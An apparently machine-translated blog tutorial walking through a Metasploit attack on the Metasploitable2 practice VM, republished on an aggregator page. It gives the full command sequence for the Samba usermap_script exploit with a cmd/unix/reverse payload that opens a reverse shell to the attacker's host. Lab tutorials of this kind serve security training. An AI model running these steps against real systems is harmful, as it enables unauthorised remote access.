当前位置:网站首页>Metasploit penetration
Metasploit penetration
2022-04-21 13:34:00 【just a leaf】
metasploit penetration
Preface
metasploit It's an open source tool , Designed to facilitate penetrant testing , from Ruby Modular framework written in programming language , It has good expansibility , Easy for penetration testers to develop
One 、Metasploit Module composition of
- Auxliaries( Auxiliary modules )
- Exploit( Exploit module )
- Payload( Attack load module )
- Post( Later infiltration modules )
- Encoders( Coding tool module )
Two 、 Attack steps
- Scanning target and system
- Select and configure a exploit module
- Select and configure an attack payload module
- Choose a coding technique , Used to bypass antivirus software
- Penetration attack
3、 ... and 、 Exploit
Target preparation
Metasploitable2 It is a specially made tool mainly used for testing and demonstrating common vulnerability attacks ubuntu operating system
The installation address is as follows :
https://information.rapid7.com/download-metasploitable-2017.html
The account and password are msfadmin Sign in
Use process
kali In the open msf
msfconsole
Scan the target version
nmap -sV ip( there ip It's from the target ip)
Through the collection of relevant information about the target, and then exploit and payload Make a selection
Select the vulnerability module
It's found here that samba3.x service
adopt search samba Command query samba Exploit vulnerabilities and select appropriate exploit modules
This is sorted according to the difficulty of vulnerability utilization
Here the exploit/multi/samba/usermap_script Exploit module
use exploit/multi/samba/usermap_script
show payload( View available attack payload modules )
show options( You can view the module utilization conditions )
Marked here yes Is the parameter that must be defined
Configure vulnerability module
Set the selected attack load module
set payload cmd/unix/reverse( Note that the selected module should correspond to the operating system of the target. Here is Linux)
Set up the target IP
set RHOST 192.168.x.xxx
Set the exploit port number
set RPORT 445
Set the host to launch the attack IP
set LHOST 192.168.x.xxx
The attack
Attack after setting parameters
exploit/run
There will be a... Between the attacker and the target shell Connect , You can execute any command through the command
Then input hostname/uname -a/ifconfig… Command to query
版权声明
本文为[just a leaf]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204211332197902.html
边栏推荐
- 北京大学ACM Problems 1009:Edge Detection
- JDBC 驱动升级到 Version 8.0.28 连接 MySQL 的踩坑记录
- What kind of comfortable sports earphones are recommended
- 农产品期货品种有哪些呢?
- Can great talents be of little use? Oceanbase integration scenario test
- S:单位增益补偿
- no server suitable for synchronization found
- nmap使用
- Could not load dynamic library ‘libcusolver.so.11‘
- How to install the database of Dameng 8 version in Kirin V10 SP2
猜你喜欢
随机推荐
OJ daily practice - piecewise function
Q: How to change the number of appendix in the paper with the text.
leetcode:824. Goat Latin [simple string manipulation]
Access的BOM开发(3)BOM展开
[digital signal processing] correlation coefficient (concept analysis of correlation coefficient | signal energy constant | conjugate sequence | correlation of sequence at the same time)
Wanzi dry goods! Help you deeply master the knowledge points of "light and shadow" in design (Part 2)
北京大学ACM Problems 1012:Maya Calendar
[digital signal processing] correlation function (energy signal | cross correlation function of energy signal | autocorrelation function of energy signal)
农产品期货品种有哪些呢?
An example of expert system and its skeleton system
In office word 2016, omml2mml appears when the formula edited by word's own formula editor is transferred to MathType Solutions to XSL problems
Installing and configuring canal
Design and implementation of SSM college laboratory safety training system docx
C language nesting exercise
Flink相关API开发及运行架构和实现原理详解
完成数亿元融资后,毫末智行计划超百城落地城市智能驾驶产品
做自媒体、短视频,不要再相信那些互关、互赞了
做自媒体、短视频,不用自己拍视频,大周教你一个快速起号的方法
完成数亿元融资后,毫末智行计划超百城落地城市智能驾驶产品
百度地图开发自定义信息窗口openInfoWindow样式